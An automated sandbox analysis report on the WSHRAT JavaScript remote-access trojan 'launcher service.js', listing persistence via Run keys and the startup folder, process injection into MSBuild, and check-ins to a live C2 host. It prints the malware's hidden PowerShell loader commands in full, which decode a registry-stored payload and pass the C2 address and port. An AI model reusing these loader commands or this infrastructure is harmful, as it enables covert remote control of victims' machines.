Analysis Overview
SHA256
6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411
Threat Level: Known bad
The file launcher service.js was found to be: Known bad.
Malicious Activity Summary
WSHRAT
suricata: ET MALWARE WSHRAT CnC Checkin
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
Blocklisted process makes network request
Drops startup file
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of SetThreadContext
Enumerates physical storage devices
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-12-10 02:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-12-10 02:33
Reported
2021-12-10 02:35
Platform
win7-en-20211208
Max time kernel
147s
Max time network
148s
Command Line
Signatures
WSHRAT
suricata: ET MALWARE WSHRAT CnC Checkin
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
Blocklisted process makes network request
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\system32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 880 set thread context of 1672 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\launcher service.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'ben738sj11xz.mywire.org 5478 \"WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
path ben738sj11xz.mywire.org 5478 "WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands" 1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ben738sj11xz.mywire.org | udp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
Files
memory/760-54-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\launcher service.js
| MD5 | 8dce2fac1cdb56ef997f0c4f8065f82e |
| SHA1 | da01f70d7035a8e8421d2296c7b481dc6dcb2b09 |
| SHA256 | 6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411 |
| SHA512 | cb622198fee5d9810e6762f82c78da1a3868b1b67061d788b1af124f6f39456de73b7ba90452098983ff32762f28d471b1c546d228a393cf7364e1babfaac6a3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js
| MD5 | 56cc519ca00b696dd0d9d838a9df6149 |
| SHA1 | bfcce8ca529830cc108ab0dfdb68fe7f28892fc2 |
| SHA256 | c603708f2f3ed06b04977c58aa125455c22420655f59f37f0b52d99bc70a09c0 |
| SHA512 | 61c9d8dba7e20f3f3af3e95fb6ed86e6ee9ebb214f6eb97bfeb38fc66bbd35b1b7af70773ab99f3f33c5f47524d0075de0c07cc4024a59182c8fb10434be5ca5 |
memory/1876-57-0x0000000000000000-mapping.dmp
memory/1876-58-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmp
memory/1876-60-0x00000000023C0000-0x00000000023C2000-memory.dmp
memory/1876-61-0x00000000023C2000-0x00000000023C4000-memory.dmp
memory/1876-62-0x00000000023C4000-0x00000000023C7000-memory.dmp
memory/1876-59-0x000007FEF27B0000-0x000007FEF330D000-memory.dmp
memory/1876-63-0x00000000023CB000-0x00000000023EA000-memory.dmp
memory/1664-64-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2f456a2e7614bd05f70e38f44de562e8 |
| SHA1 | a178d6029bf058155afe0a1189f272df8e8f501e |
| SHA256 | b1445efff6c939d9b31332af4721d3d9e859b195d663931f5a9851abe336cb04 |
| SHA512 | bb34e25ae60da30aa0c9bff74678b127ba9cad85f4bcbe46ba93d06ecba14e975ad978b50a75260134d67f105e42a1d37a363148041dab9ac713a3131a75b01e |
memory/1664-67-0x000007FEF2740000-0x000007FEF329D000-memory.dmp
memory/1664-68-0x0000000002560000-0x0000000002562000-memory.dmp
memory/1664-70-0x0000000002564000-0x0000000002567000-memory.dmp
memory/1664-69-0x0000000002562000-0x0000000002564000-memory.dmp
memory/1664-71-0x000000001B730000-0x000000001BA2F000-memory.dmp
memory/1664-72-0x000000000256B000-0x000000000258A000-memory.dmp
memory/880-73-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2f456a2e7614bd05f70e38f44de562e8 |
| SHA1 | a178d6029bf058155afe0a1189f272df8e8f501e |
| SHA256 | b1445efff6c939d9b31332af4721d3d9e859b195d663931f5a9851abe336cb04 |
| SHA512 | bb34e25ae60da30aa0c9bff74678b127ba9cad85f4bcbe46ba93d06ecba14e975ad978b50a75260134d67f105e42a1d37a363148041dab9ac713a3131a75b01e |
memory/880-76-0x000007FEF27B0000-0x000007FEF330D000-memory.dmp
memory/880-77-0x0000000002740000-0x0000000002742000-memory.dmp
memory/880-79-0x0000000002744000-0x0000000002747000-memory.dmp
memory/880-78-0x0000000002742000-0x0000000002744000-memory.dmp
memory/880-80-0x000000001B700000-0x000000001B9FF000-memory.dmp
memory/1672-81-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1672-82-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1672-83-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1672-84-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1672-85-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1672-86-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1672-87-0x00000000004071AE-mapping.dmp
memory/880-88-0x000000000274B000-0x000000000276A000-memory.dmp
memory/1672-89-0x0000000074EC1000-0x0000000074EC3000-memory.dmp
memory/1672-90-0x0000000000370000-0x0000000000371000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-12-10 02:33
Reported
2021-12-10 02:35
Platform
win10-en-20211208
Max time kernel
150s
Max time network
155s
Command Line
Signatures
WSHRAT
suricata: ET MALWARE WSHRAT CnC Checkin
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
Blocklisted process makes network request
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" | C:\Windows\system32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 864 set thread context of 2160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\launcher service.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
